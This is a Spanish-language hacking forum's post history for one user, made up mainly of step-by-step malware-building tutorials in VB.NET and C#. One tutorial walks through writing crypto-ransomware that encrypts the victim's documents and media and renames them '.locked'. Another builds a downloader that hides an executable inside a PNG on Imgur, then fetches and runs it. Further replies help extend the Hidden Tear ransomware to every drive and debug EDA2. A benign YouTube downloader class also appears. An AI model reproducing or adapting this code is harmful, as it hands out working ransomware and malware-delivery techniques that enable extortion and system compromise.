Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - fudmario

Páginas 1 ... 6 7 8 9 10

#141

Dudas y pedidos generales / Re:Compilar en c# (parte 2)

Febrero 11, 2016, 04:36:17 PM

Creo que si hubieses explicado y mostrado los errores que se producen, hubiese sido mas facil ayudarte.

Mira si haces clic en la parte derecha en el explorador de soluciones en donde dice referencias veras algo como esto:

La razon por la cual genera esos errores, es porque esta referenciadas librerias que no tienes, solo busca las diferentes librerias que ahi muestra y las agregas a la solucion y ahí podras compilar...

Saludos.

#142

Desarrollo y modificación de malwares / Re:RANSOMWARE: ¿Qué es? ¿Cómo funciona? ¿Cómo Crearlo? By fudmario.

Enero 09, 2016, 02:17:19 AM

continuando con la Publicación, Ahora comenzaremos a crear nuestro virus, creando nuestras primeras lineas de código,
Lo que necesitaremos:
Nuestra Lista de extensiones de archivos objetivos, los documentos/archivos objetivos serán pocas: ".doc, .docx, .txt, .jpg, .png, .mp3, .mp4"

Código: vbnet

 Dim mExts As IEnumerable(Of String) = {".doc", ".docx", ".txt", ".jpg", ".png", ".mp3", ".mp4"}

Ahora bien, para Enumerar Los Archivos vamos a crear una funcion que nos permita filtrar por extensiones.

Utilizaremos la funcion GetFiles de la Clase You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, la cual nos devuelve los nombres de los archivos (con sus rutas de acceso) que coincidan con el patrón de búsqueda especificado, nuestro patron de busqueda será que enumere todos los archivo y en todos los subdirectorios, luego mediante un recorrido por nuestra lista de extensiones compararemos con cada fichero y retornaremos solo las que cumplan la condicion y para que busque en todos los subdirectorios en SearchOption usaremos AllDirectories.

Para Simplificar el código, en vez de usar varios for para listar los archivos y compara con las extensiones, utilizaremos LINQ.

Código: vbnet

    Public Shared Function GetFiles(dirPath As String, mExts As IEnumerable(Of String)) As IEnumerable(Of String)
        Return (From mFile In IO.Directory.GetFiles(dirPath, "*", IO.SearchOption.AllDirectories) Where mExts.Contains(IO.Path.GetExtension(mFile).ToLower())).ToList()
      End Function

Para el Cifrado y Decifrado de Archivos, aqui reduciremos el trabajo y utilizaremos una subrutina sencilla que encontre en CodeProject(Ver You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login), con algunas pequeñas modificaciones:
Pero Antes importaremos los siguiente NameSpace:

Código: vbnet

Imports System.IO
Imports System.Security.Cryptography
Imports System.Text

Pues basicamente la Subrutina de Cifrado tendrá dos paramentros, uno para la ruta de Archivo y Otra Para la Contraseña, la cual nos permitira cifrar el archivo, posteriormente cambiarle de extension a .locked

Código: vbnet

Public Shared Sub EncodeFile(filename As String, password As String)
        Dim key As Byte() = New Byte(31) {}
        Encoding.Default.GetBytes(password).CopyTo(key, 0)
        Dim aes As New RijndaelManaged() With
            {
                .Mode = CipherMode.CBC,
                .KeySize = 256,
                .BlockSize = 256,
                .Padding = PaddingMode.Zeros
            }
        Dim buffer As Byte() = File.ReadAllBytes(filename)
        Using mStream As New MemoryStream
            Using cStream As New CryptoStream(mStream, aes.CreateEncryptor(key, key), CryptoStreamMode.Write)
                cStream.Write(buffer, 0, buffer.Length)
                Dim appendBuffer As Byte() = mStream.ToArray()
                Dim finalBuffer As Byte() = New Byte(appendBuffer.Length - 1) {}
                appendBuffer.CopyTo(finalBuffer, 0)
                File.WriteAllBytes(filename, finalBuffer)

            End Using
        End Using
        File.Move(filename, filename & ".locked")
    End Sub

De Forma similar a la Funcion de Cifrado, la funcion de decifrado lo hará de forma Inversa.

Código: vbnet

Public Shared Sub DecodeFile(filePath As String, password As String)

        Dim key As Byte() = New Byte(31) {}
        Encoding.Default.GetBytes(password).CopyTo(key, 0)
        Dim aes As New RijndaelManaged() With
            {
                .Mode = CipherMode.CBC,
                .KeySize = 256,
                .BlockSize = 256,
                .Padding = PaddingMode.Zeros
            }
        Dim buffer As Byte() = File.ReadAllBytes(filePath)
        Using outputStream As New FileStream(filePath, FileMode.Create)
            Using cryptoStream As New CryptoStream(outputStream, aes.CreateDecryptor(key, key), CryptoStreamMode.Write)
                cryptoStream.Write(buffer, 0, buffer.Length)
            End Using
        End Using
        File.Move(filePath, filePath.Replace(".locked", ""))
    End Sub

Como parte de las Opciones Extras para nuestra virus, les habia comentado que algunas variantes de estos tipos de malware lo que hacian era cambiar el fondo de escritorio, para hacer eso usaremos la api: SystemParametersInfo.

Código: vbnet

<Runtime.InteropServices.DllImport("user32.dll", SetLastError:=True, CharSet:=Runtime.InteropServices.CharSet.Auto, BestFitMapping:=False, ThrowOnUnmappableChar:=True)>
    Public Shared Function SystemParametersInfo(ByVal uiAction As UInteger,
                                                   ByVal uiParam As UInteger,
                                                   ByVal pvParam As String,
                                                   ByVal fWinIni As UInteger
       ) As <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.Bool)> Boolean
    End Function

Ahora crearemos una funcion la cual nos permita Establecer el Fondo del Escritorio(de manera predeterminada quedará centrada estableciendo valores al Regedit):

Código: vbnet

 Public Shared Function SetDesktopWallpaper(ByVal img As String) As Boolean
        Try

            Using regKey As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("Control Panel\Desktop", True)
                regKey.SetValue("TileWallpaper", "0")
                regKey.SetValue("WallpaperStyle", "0")
            End Using

            Return SystemParametersInfo(&H14, Nothing, img, &H0)
        Catch ex As Exception
        End Try
        Return False
    End Function

La forma de usar las funciones Serian:

Código: vbnet

  Private Sub RunActions()
		SetDesktopWallpaper("C:\myRansomwareBasic.bmp")
        Dim mExts As IEnumerable(Of String) = {".doc", ".docx", ".txt", ".jpg", ".png", ".mp3", ".mp4"}
        Dim filepath As String = "C:\"
        For Each mFile As String In GetFiles(filepath, mExts)
            EncodeFile(mFile, "MyPassword")
        Next
    End Sub

Teoricamente con esto ya tendriamos lo necesario para que funcione nuestro crypto-ransomware.

PD: Si alguien tiene alguna duda en alguna parte del Código o considera que existe alguna mejor Forma de Hacerlo, pueden comentar en el Mismo hilo.

Q. ¿Y eso es todo?
A. No, aun seguiremos implementando mas cosas.

En la siguiente entrega seguiremos implementado algunas cosas mas a nuestro virus, y comenzaremos a armar nuestro panel y parte de nuestro builder tambien veremos como se realizan las peticiones POST desde una aplicacion You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

#143

Desarrollo y modificación de malwares / RANSOMWARE: ¿Qué es? ¿Cómo funciona? ¿Cómo Crearlo? By fudmario.

Enero 07, 2016, 01:55:29 AM

Hola a todos, en esta serie de publicaciones vamos a explicar el funcionamiento de un malware del tipo "Crypto-Ransomware" o "filecoder", como siempre, intentando de ser lo más simple y sencillo para su aprendizaje(No entraremos mucho en conceptos, solo lo suficiente para lograr comprenderlo).

En anteriores publicaciones que hice hace tiempo...xD explique técnicas de análisis y desinfección de este tipo de Malware.
Los que NO lo vieron, pueden mirarlo aquí->

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Esta serie de publicaciones será como ver desde el otro lado en el cual nuestro objetivo será Entender el funcionamiento, creación, montaje de este tipo de malware.
No sé cuántas publicaciones sean o si me alcanzará el tiempo a terminarlas todas...xD, pero intentaré terminarlo todo.

Preguntas Frecuentes:
¿Porque crear este Tutorial?
R. Para aprender el funcionamiento de este tipo de malware y así poder evitar posibles infecciones(o para promover el desarrollo de software malicioso....xDD). Cada quien es responsable del uso que le dé a esta información.

¿Me Ayudarías a Crear uno completamente FUD y ayudar a Montarlo para poder Infectar?
R.- NO. El tutorial explicará cómo crearlo paso a paso, como se puede crear, montar, pero bajo ninguna circunstancia ayudaré a cometer Delitos, a no ser que sea por Dinero....xDD.

¿Y por qué no crearlo más antes? , ¿Si hay mucha información al Respecto para que hacerlo ahora?
R.- Y bueno como tengo unos días de vacación, dije: "Bueno porque no Crearlo,....xD".

¿Qué pretendes con esta Información?
Que más allá de conocer cómo funciona este tipo de malware, es también incentivar a usuarios a aprender algún lenguaje de programación, ya que el lenguaje que conozco un poco más es You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login usaremos ese....xD, pero se intentará dar la información necesaria para que puedan extrapolar la información y aplicarlo a diferentes lenguaje.

Comencemos....

RANSOMWARE:

CitarEste tipo de malware lo que básicamente hace es: Secuestrar nuestra información, en la cual mediante diversas técnicas puede llegar a Bloquear el acceso a nuestro Sistema, cifrar archivos (generalmente: pdf,doc, docx, pptp.....etc los más usados), obligando a la víctima a dar una cierta cantidad de dinero para poder recuperar la información.
En ciertas ocasiones cuando este tipo de malware utiliza un algoritmo de cifrado débil o guarda la contraseña de cifrado en algún lugar de nuestra PC o si el archivo es eliminado de forma estándar, es posible llegar a recuperarlo sin pagar.

Veamos cómo funciona con una muestra analizada: "CTB-Locker (Curve-Tor-Bitcoin Locker)"
Una vez ejecutada el malware lo que hace es comenzar a cifrar archivos generalmente a archivos comunes.

Posteriormente nos muestra un mensaje (algo similar cambiando nuestro wallpaper,...etc):

En la cual nos da información sobre como rescatar nuestra información:
Online:

Offline:

Para agregar nuestra Public Key hay que ingresar a la Url que nos da:

Y después de Agregar la Public Key.

En la cualquiera de los dos casos nos da las instrucciones para poder pagar el rescate y recuperar nuestra información.

Bueno hasta aquí hoy...xD, es una pequeña introducción sobre el Tema.

Nuestra meta será crear nuestro propio virus, luego nuestro propio Builder/Constructor para generar el virus, montar nuestro panel de nuestro Crypto-Ransomware agregar varias funciones/opciones.

Avances:

En la siguiente entrega explicaremos, cuál será la estructura de nuestro propio Crypto-Ransomware.
Crear la estructura de nuestro primer Crypto-Ransomware (Modo Offline) basado en el ejemplo anterior y que opciones contendrá nuestro Virus...xD.
Comenzaremos a programar nuestras primeras líneas de código (Enumeración de archivos, filtración por extensiones y más.....xD).

#144

Dudas y pedidos generales / Re:[AYUDA] Archivos encriptados por Ransomware

Enero 07, 2016, 01:34:56 AM

Talves te sirva: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Igualmente, si quieres puedes enviarme la muestra por Mensaje privado para poder analizarlo y si tiene solucion te respondo por aqui.

Saludos.

#145

Tutoriales y Manuales de Malwares / Re:Downloader, ¿Qué es?, ¿Cómo Crearlo? by fudmario

Enero 03, 2016, 11:00:16 AM

Gracias a todos por Comentar...xD

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Es interesante Mario. Enhorabuena

No soy mario, es mejor fudmario....xD

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Tengo una duda, mas que duda es una pregunta: cuál sería el equivalente Net.Webclient en php? o sería igual a lo siguiente:
header ("Content-Disposition: attachment; filename=$enlace ");
header ("Content-Type: application/force-download");
header ("Content-Length: ".filesize($enlace));
readfile($enlace);
porque no conozco mucho de visual net.
Desde ya, muchas gracias.

Yo tampoco conozco mucho de PHP, pero el metodo DownloadData de la Clase System.Net.WebClient lo que hace es descargar el contenido de la imagen en una matriz de bytes, no sabria decirte cual es la mejor forma de hacerlo en PHP, talvez podrias hacerlo con: "file_get_contents"

Saludos,.

#146

Tutoriales y Manuales de Malwares / Downloader, ¿Qué es?, ¿Cómo Crearlo? by fudmario

Enero 01, 2016, 12:12:09 PM

Casi siempre me pregunta por SKYPE, si conozco algun hosting de descarga directa que no detecte los antivirus, para subir malware, por lo general siempre respondo: "NO, no conozco ninguno, pero puedes usar cualquier Hosting xD", asi que hoy les voy a mostrar como usar cualquier hosting para subir malware.

Hoy hablaremos sobre un tipo de malware llamado: Downloader.

¿Qué es un Downloader?

CitarEste tipo de malware lo que hace es descarga en secreto archivos maliciosos desde un servidor remoto, para posteriormente ejecutarlo,instalar software malicioso en el Sistema.

CitarBasicamente lo que hace es descargar malware(troyanos,keyloggers,...,etc.) subido en algun hosting, generalmente se usan hosting de descarga directa(ej: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login) o en algunos casos suben a servidores tipo Pastebin, You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login o similares previamente codificado (El problema principal de estos hosting de descarga directa es que son detectados por los AntiVirus.).

Ya sabiendo que es y como funciona, voy a explicar como crear uno (No es muy complicado en realidad es muy sencillo):
Para este proposito usaremos un hosting que permite subir Imagenes llamado "Imgur", si, si Imgur...xD un servidor web que nos permite el almacenamiento de Imagenes.

Subir directamente cambiando de extension a un ejecutable(por un .jpg o .png) no funcionará debido a sus medidas de proteccion que usa para subir imagenes en IMGUR.

Lo que haremos será unir: "imagen + ejecutable",sencillo no?, con eso ya tendriamos solucionado el tema de subir sin problemas el malware,

El lenguaje de programacion que elijan para crearlo es indistinto, yo lo haré en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Para unir : "Imagen + Server", lo haremos de la siguiente forma:

Código: vbnet

Dim imgbytes As Byte() = IO.File.ReadAllBytes("D:\img.png") ' Leemos el contenido de la Imagen
        Dim serverbytes As Byte() = IO.File.ReadAllBytes("D:\Anotador.exe") ' Leemos el Contenido del Malware(troyanos, keylogger,....etc)
        Using fs As New IO.FileStream("tmp.png", IO.FileMode.Create) ' Comenzaremos a escribir nuestra nueva imagen con la Imagen Inicial + Server.
            fs.Write(imgbytes, 0, imgbytes.Length)
            fs.Write(serverbytes, 0, serverbytes.Length)
        End Using
        MessageBox.Show("Done!!!")

Subimos la Imagen al Imgur:

Para Descargar el Server, lo haremos de la siguiente manera:

Código: vbnet

Dim imgbytes As Byte() ' Variable para almacenar la imagen
Const imgSize As Integer = 17083   ' Tamaño de la Imagen Inicial
Using wc As New Net.WebClient()
    imgbytes = wc.DownloadData("http://i.imgur.com/6TZKG9q.png")
    Using ms As New IO.MemoryStream(imgbytes, imgSize, imgbytes.Length - imgSize) 'Aqui obtenemos el tamaño del malware, separando de la imagen Inicial.
        ' Aqui se puede hacer cualquier cosa, droppear el archivo en Disco/
        ' IO.File.WriteAllBytes("D:\Test1.exe", ms.ToArray)
        ' Process.Start("D:\Test1.exe")
    End Using
End Using

Algunas cosas que debes considerar:

Si vemos con algun editor Hexadecimal, veremos que se puede ver el ejecutable, una opcion es cifrar el archivo.

Pues nada cualquier duda comentar en el hilo, Mensaje Privado o por Skype.

#147

Análisis y desarrollo de malwares / Re:Configurando EDA2

Diciembre 30, 2015, 09:18:08 AM

En realidad creo que no es por la version de compilacion de framework.

De la Imagen que muestra el error, lo unico que entiendo es el (404).....xD, aqui tienes mas informacion al respecto: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Es un error del tipo System.Net.WebException, en este caso, es posible que la dirección url hacia el panel que pusiste en la configuracion no sea correcta, revisa eso.
Mas alla de eso, como recomendacion personal, es mejor que aprendas a programar y tambien que conozcas como funciona un malware de este tipo, ya que el proyecto en si no tiene control de errores, por lo cual llegaria a producir varios errores en tiempo de ejecución bajo ciertas circunstancias.

#148

Análisis y desarrollo de malwares / Re:Configurando Hidden Tear (Offline)

Diciembre 09, 2015, 09:07:59 PM

Sobre el Error en Windows XP: Si no me equivoco windows xp solo acepta hasta .NetFramework 4, el proyecto como Framework destino es: 4.5, lo que puedes hacer es cambiar a 4 o 3,5.

Sobre el Error en la Ruta: puede usar directamente:

Código: csharp


System.Environment.GetFolderPath(Environment.SpecialFolder.Desktop)

Y respecto a que "incluyera el equipo completo":
puedes usar : System.IO.DriveInfo.GetDrives() -> You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Para poder listar los Discos en el Sistema:

Código: csharp


 foreach (var str in System.IO.DriveInfo.GetDrives())
            {
                if (str.DriveType != System.IO.DriveType.CDRom)
                {
                 // Aqui pudes cifrar los archivos de los discos: encryptDirectory(str.Name, password);                    
                }
            }

#149

C# - VB.NET / [Vb.Net] YouTubeHelper by fudmario

Noviembre 21, 2015, 12:22:57 AM

Código: vbnet


' ***********************************************************************
' Assembly         : Youtube Downloader
' Author           : fudmario
' Created          : 15-06-2015
'
' Last Modified By : fudmario
' Last Modified On : 11-20-2015
' ***********************************************************************
' <copyright file="YoutubeHelper.vb" company="FudmarioDev">
'     '     Copyright ©  2015
'
' </copyright>
' <summary></summary>
' *************************************************************************

Option Explicit On
Option Strict On
Option Infer On

Imports System.Collections.Specialized
Imports System.Net
Imports System.Text
Imports System.Text.RegularExpressions
Imports System.Web

''' <summary>
''' Class YoutubeHelper. Esta Clase no puede ser Heredada.
''' </summary>
Public NotInheritable Class YoutubeHelper
    ''' <summary>
    ''' Url para Obtener la Información del Video
    ''' </summary>
    Private Const InfoUrl As String = "http://www.youtube.com/get_video_info?video_id="

    ''' <summary>
    ''' Expresión Regular para obtener el Link de la imagen del Video.
    ''' </summary>
    ''' <value>The imagen.</value>
    Private Shared ReadOnly Property Imagen As Regex
        Get
            Return New Regex("<meta\sproperty=""og:image""\scontent=""(.*?default\.jpg)"">")
        End Get
    End Property

    ''' <summary>
    ''' Expresion Regular para Obtener el Título del video.
    ''' </summary>
    ''' <value>The title.</value>
    Private Shared ReadOnly Property Title As Regex
        Get
            Return New Regex("<meta\sproperty=""og:title""\scontent=""(.*?)"">")
        End Get
    End Property

    ''' <summary>
    ''' Expresion Regular para obtener la Descripción del Video.
    ''' </summary>
    ''' <value>Descripción del Video.</value>
    Private Shared ReadOnly Property Description As Regex
        Get
            Return New Regex("<meta\sproperty=""og:description""\scontent=""(.*?)"">")
        End Get
    End Property

    ''' <summary>
    ''' Expresion Regular para obtener la Duracion del Video (en segundos).
    ''' </summary>
    ''' <value> Duracion del Video (en segundos).</value>
    Private Shared ReadOnly Property Duration As Regex
        Get
            Return New Regex("length_seconds"":""(.*?)"",")
        End Get
    End Property
	
	''' <summary>
    ''' Obtiene Informacion sobre la Url de Video de Youtube.
    ''' </summary>
    ''' <param name="url">Url del Video de YouTube.</param>
    ''' <param name="byPass">Si se establece como <c>true</c> aplicamos el bypass.</param>
    ''' <returns>YouTubeVideoInformation.</returns>
    ''' <exception cref="ArgumentNullException">La <paramref name="url" /> no puede estar vacia;url</exception>
    ''' <exception cref="FormatException">Formato de <paramref name="url" /> Invalido;Url</exception>
    Public Shared Function GetYouTubeVideoInfo(url As String, Optional ByVal byPass As Boolean = False) As YouTubeVideoInformation

        If String.IsNullOrEmpty(url) Then Throw New ArgumentNullException(message:="La Url no puede estar vacia", paramName:="URL")

        If Not Regex.IsMatch(url, "(http|https):..(www\.)?youtube.com.watch\?v=") Then Throw New FormatException(message:="Formato de Url Invalido")

        Dim videoInfoFull As New YouTubeVideoInformation
        Dim infoVideo As New List(Of YoutubeVideoInfo)
        Dim adInfoVideo As YoutubeVideoInfo
        Dim mSource As String
        Dim arrayParams As NameValueCollection

        Using c As New WebClient
            c.Encoding = Encoding.GetEncoding(1252)
            mSource = c.DownloadString(url)

            Select Case byPass
                Case True
                    arrayParams = HttpUtility.ParseQueryString(HttpUtility.HtmlDecode(c.DownloadString(String.Format("{0}{1}&el=vevo", InfoUrl, HttpUtility.ParseQueryString(New Uri(url).Query).Get("v")))))
                Case Else
                    arrayParams = HttpUtility.ParseQueryString(HttpUtility.HtmlDecode(c.DownloadString(String.Format("{0}{1}", InfoUrl, HttpUtility.ParseQueryString(New Uri(url).Query).Get("v")))))
            End Select
        End Using

        Dim ytTitle As String = HttpUtility.HtmlDecode(Title.Match(mSource).Groups(1).Value)
        Dim ytDescription As String = HttpUtility.HtmlDecode(Description.Match(mSource).Groups(1).Value)
        Dim ytDuration As Double = CDbl(Duration.Match(mSource).Groups(1).Value)
        Dim ytImg As String = Imagen.Match(mSource).Groups(1).Value

        If arrayParams("status") = "ok" Then

            Dim urLs As String() = arrayParams("url_encoded_fmt_stream_map").Split(","c)
            Dim sb As New StringBuilder()
            For i = 0 To urLs.Length - 1
                adInfoVideo = New YoutubeVideoInfo()
                sb.Clear()
                Dim mUriDec As String = HttpUtility.HtmlDecode(urLs(i))
                Dim urlParams As NameValueCollection = HttpUtility.ParseQueryString(mUriDec)
                Dim vidFormat As String = HttpUtility.HtmlDecode(urlParams("type"))
                sb.Append(HttpUtility.HtmlDecode(urlParams("Url")))
                sb.AppendFormat("&signature={0}", HttpUtility.HtmlDecode(urlParams("sig")))
                sb.AppendFormat("&type={0}", vidFormat)
                sb.AppendFormat("&title={0}", HttpUtility.HtmlDecode(arrayParams("title")))

                Dim format As String = vidFormat.Split(";"c)(0).Split("/"c)(1)
                If format.Contains("x-flv") Then
                    format = "flv"
                End If

                adInfoVideo.Url = sb.ToString
                adInfoVideo.Quality = urlParams("quality")
                adInfoVideo.Format = format
                infoVideo.Add(adInfoVideo)
            Next
            videoInfoFull.ErrorCode = 0
            videoInfoFull.LinksDetails = infoVideo
            videoInfoFull.Title = ytTitle
            videoInfoFull.Duration = ytDuration
            videoInfoFull.Description = ytDescription
            videoInfoFull.ImgLink = ytImg
            Return videoInfoFull
        Else
            videoInfoFull.ErrorCode = 1
            videoInfoFull.ErrorMsg = HttpUtility.HtmlDecode(arrayParams("reason"))
            Return videoInfoFull
        End If

    End Function
End Class

''' <summary>
''' Información Básica del Video.
''' </summary>
Public Class YoutubeVideoInfo
    ''' <summary>
    ''' Obtiene o Establece la Url Directa del Video.
    ''' </summary>
    ''' <value>Url Directa del Video.</value>
    Public Property Url() As String
    ''' <summary>
    ''' Obtiene o Establece el Formato del Video.
    ''' </summary>
    ''' <value>Formato del Video.</value>
    Public Property Format() As String

    ''' <summary>
    ''' Obtiene o Establece La Calidad del Video.
    ''' </summary>
    ''' <value>Calidad del Video.</value>
    Public Property Quality() As String

End Class

''' <summary>
''' Información Completa del Video de YouTube.
''' </summary>
Public Class YouTubeVideoInformation
    ''' <summary>
    ''' Obtiene o Establece la lista de Link's Disponibles y Informacion Adicional.
    ''' </summary>
    ''' <value>lista de Link's Disponibles.</value>
    Public Property LinksDetails() As List(Of YoutubeVideoInfo)

    ''' <summary>
    ''' Obtiene o Establece El Titulo del Video.
    ''' </summary>
    ''' <value>El Titulo del Video.</value>
    Public Property Title() As String

    ''' <summary>
    ''' Obtiene o Establece El link de la Imagen del Video.
    ''' </summary>
    ''' <value>El link de la Imagen del Video.</value>
    Public Property ImgLink() As String

    ''' <summary>
    ''' Obtiene o Establece la Descripción del Video.
    ''' </summary>
    ''' <value>la Descripción del Video.</value>
    Public Property Description() As String

    ''' <summary>
    ''' Obtiene o Establece la Duracion del Video.
    ''' </summary>
    ''' <value>Duracion del Video.</value>
    Public Property Duration() As Double
    ''' <summary>
    ''' Obtiene o Establece el codigo de Error: 0 = No Error, 1 = Error.
    ''' </summary>
    ''' <value>codigo de Error: 0 = No Error, 1 = Error..</value>
    Public Property ErrorCode() As Integer

    ''' <summary>
    ''' Obtiene o Establece el Mensaje de Error.
    ''' </summary>
    ''' <value>Mensaje de Error.</value>
    Public Property ErrorMsg() As String
End Class

Ejemplo de Uso:

Código: vbnet

Dim response As YouTubeVideoInformation
        response = YoutubeHelper.GetYouTubeVideoInfo("https://www.youtube.com/watch?v=mWRsgZuwf_8", True)
        If response.ErrorCode = 0 Then

            Dim sb As New System.Text.StringBuilder
            sb.AppendLine(String.Format("Titulo: {0}", response.Title))
            sb.AppendLine(String.Format("Descripción: {0}", response.Description))
            sb.AppendLine(String.Format("Duración: {0}", TimeSpan.FromSeconds(response.Duration).ToString("hh\:mm\:ss")))
            sb.AppendLine(String.Format("Url de la Imagen: {0}", response.ImgLink))
            sb.AppendLine()
            sb.AppendLine("Urls: ")
            For Each urldetails As YoutubeVideoInfo In response.LinksDetails

                sb.AppendLine("*************************")
                sb.AppendLine(String.Format("Url: {0}", urldetails.Url))
                sb.AppendLine(String.Format("Formato: {0}", urldetails.Format))
                sb.AppendLine(String.Format("Calidad: {0}", urldetails.Quality))

            Next
            MessageBox.Show(sb.ToString)
        Else
            MessageBox.Show(response.ErrorMsg)
        End If

Retorna:

Código: text

Titulo: Imagine Dragons - Demons (Official)
Descripción: Get Smoke + Mirrors on iTunes now: http://smarturl.it/IDSmokeMirrors Get Smoke + Mirrors Deluxe version with 4 exclusive songs only at Target: http://smartur...
Duración: 00:03:57
Url de la Imagen: https://i.ytimg.com/vi/mWRsgZuwf_8/maxresdefault.jpg

Urls: 
*************************
Url: http://r1---sn-o0x85uxa-a2ce.googlevideo.com/videoplayback?mt=1448075110&mv=m&initcwndbps=180000&itag=22&ms=au&upn=hhv_O7PIcl0&pcm2=no&mm=31&mn=sn-o0x85uxa-a2ce&expire=1448096854&mime=video%2Fmp4&pl=20&source=youtube&ratebypass=yes&dur=236.170&lmt=1429535723891505&key=yt6&ipbits=0&gcr=bo&sparams=dur%2Cgcr%2Cid%2Cinitcwndbps%2Cip%2Cipbits%2Citag%2Clmt%2Cmime%2Cmm%2Cmn%2Cms%2Cmv%2Cpcm2%2Cpcm2cms%2Cpl%2Cratebypass%2Csource%2Cupn%2Cexpire&fexp=9407156%2C9408710%2C9413137%2C9416126%2C9417683%2C9419445%2C9419837%2C9420452%2C9421097%2C9421166%2C9421411%2C9422323%2C9422541%2C9422596%2C9422618%2C9422838%2C9422992%2C9423042%2C9423431%2C9423489%2C9423643%2C9423662%2C9423667%2C9424509%2C9424740&id=o-APsq1d2t11trGfv2qYsVS9NyPHMMqsQcMSBaV7pEXwYP&sver=3&ip=161.22.129.235&signature=5582F3AC476FB6403987BF9C3CAE4DC4661C5FBB.4079167906F1B6388735F66E18D9F1C47FCF4137&pcm2cms=yes&signature=&type=video/mp4; codecs="avc1.64001F, mp4a.40.2"&title=Imagine Dragons - Demons (Official)
Formato: mp4
Calidad: hd720
*************************
Url: http://r1---sn-o0x85uxa-a2ce.googlevideo.com/videoplayback?mt=1448075110&mv=m&initcwndbps=180000&itag=43&ms=au&upn=hhv_O7PIcl0&pcm2=no&mm=31&mn=sn-o0x85uxa-a2ce&expire=1448096854&mime=video%2Fwebm&pl=20&source=youtube&ratebypass=yes&dur=0.000&lmt=1367614381944548&key=yt6&ipbits=0&gcr=bo&sparams=dur%2Cgcr%2Cid%2Cinitcwndbps%2Cip%2Cipbits%2Citag%2Clmt%2Cmime%2Cmm%2Cmn%2Cms%2Cmv%2Cpcm2%2Cpcm2cms%2Cpl%2Cratebypass%2Csource%2Cupn%2Cexpire&fexp=9407156%2C9408710%2C9413137%2C9416126%2C9417683%2C9419445%2C9419837%2C9420452%2C9421097%2C9421166%2C9421411%2C9422323%2C9422541%2C9422596%2C9422618%2C9422838%2C9422992%2C9423042%2C9423431%2C9423489%2C9423643%2C9423662%2C9423667%2C9424509%2C9424740&id=o-APsq1d2t11trGfv2qYsVS9NyPHMMqsQcMSBaV7pEXwYP&sver=3&ip=161.22.129.235&signature=554A1CF81CD9B1BA71DCD24B2FCD5A0AE436A91E.937BA2CFC7599B38359F410DB6C3A15BE977131E&pcm2cms=yes&signature=&type=video/webm; codecs="vp8.0, vorbis"&title=Imagine Dragons - Demons (Official)
Formato: webm
Calidad: medium
*************************
Url: http://r1---sn-o0x85uxa-a2ce.googlevideo.com/videoplayback?mt=1448075110&mv=m&initcwndbps=180000&itag=18&ms=au&upn=hhv_O7PIcl0&pcm2=no&mm=31&mn=sn-o0x85uxa-a2ce&expire=1448096854&mime=video%2Fmp4&pl=20&source=youtube&ratebypass=yes&dur=236.170&lmt=1429535713281062&key=yt6&ipbits=0&gcr=bo&sparams=dur%2Cgcr%2Cid%2Cinitcwndbps%2Cip%2Cipbits%2Citag%2Clmt%2Cmime%2Cmm%2Cmn%2Cms%2Cmv%2Cpcm2%2Cpcm2cms%2Cpl%2Cratebypass%2Csource%2Cupn%2Cexpire&fexp=9407156%2C9408710%2C9413137%2C9416126%2C9417683%2C9419445%2C9419837%2C9420452%2C9421097%2C9421166%2C9421411%2C9422323%2C9422541%2C9422596%2C9422618%2C9422838%2C9422992%2C9423042%2C9423431%2C9423489%2C9423643%2C9423662%2C9423667%2C9424509%2C9424740&id=o-APsq1d2t11trGfv2qYsVS9NyPHMMqsQcMSBaV7pEXwYP&sver=3&ip=161.22.129.235&signature=D2B70E8991B19CB7C9485ACE6B3BBEDD33E0723F.568B020038DC5E2E55DDEE030D20904A49C60CA1&pcm2cms=yes&signature=&type=video/mp4; codecs="avc1.42001E, mp4a.40.2"&title=Imagine Dragons - Demons (Official)
Formato: mp4
Calidad: medium
*************************
Url: http://r1---sn-o0x85uxa-a2ce.googlevideo.com/videoplayback?mt=1448075110&mv=m&initcwndbps=180000&itag=5&ms=au&upn=hhv_O7PIcl0&sparams=dur%2Cgcr%2Cid%2Cinitcwndbps%2Cip%2Cipbits%2Citag%2Clmt%2Cmime%2Cmm%2Cmn%2Cms%2Cmv%2Cpcm2%2Cpcm2cms%2Cpl%2Csource%2Cupn%2Cexpire&mm=31&mn=sn-o0x85uxa-a2ce&expire=1448096854&pcm2=no&mime=video%2Fx-flv&pl=20&source=youtube&dur=236.173&lmt=1394291864022235&key=yt6&ipbits=0&gcr=bo&fexp=9407156%2C9408710%2C9413137%2C9416126%2C9417683%2C9419445%2C9419837%2C9420452%2C9421097%2C9421166%2C9421411%2C9422323%2C9422541%2C9422596%2C9422618%2C9422838%2C9422992%2C9423042%2C9423431%2C9423489%2C9423643%2C9423662%2C9423667%2C9424509%2C9424740&id=o-APsq1d2t11trGfv2qYsVS9NyPHMMqsQcMSBaV7pEXwYP&sver=3&ip=161.22.129.235&signature=8D3DBB8B362B16C5061F3400DE492270A3B5E015.958915343DB674110377E1F86EAA543A430485F4&pcm2cms=yes&signature=&type=video/x-flv&title=Imagine Dragons - Demons (Official)
Formato: flv
Calidad: small
*************************
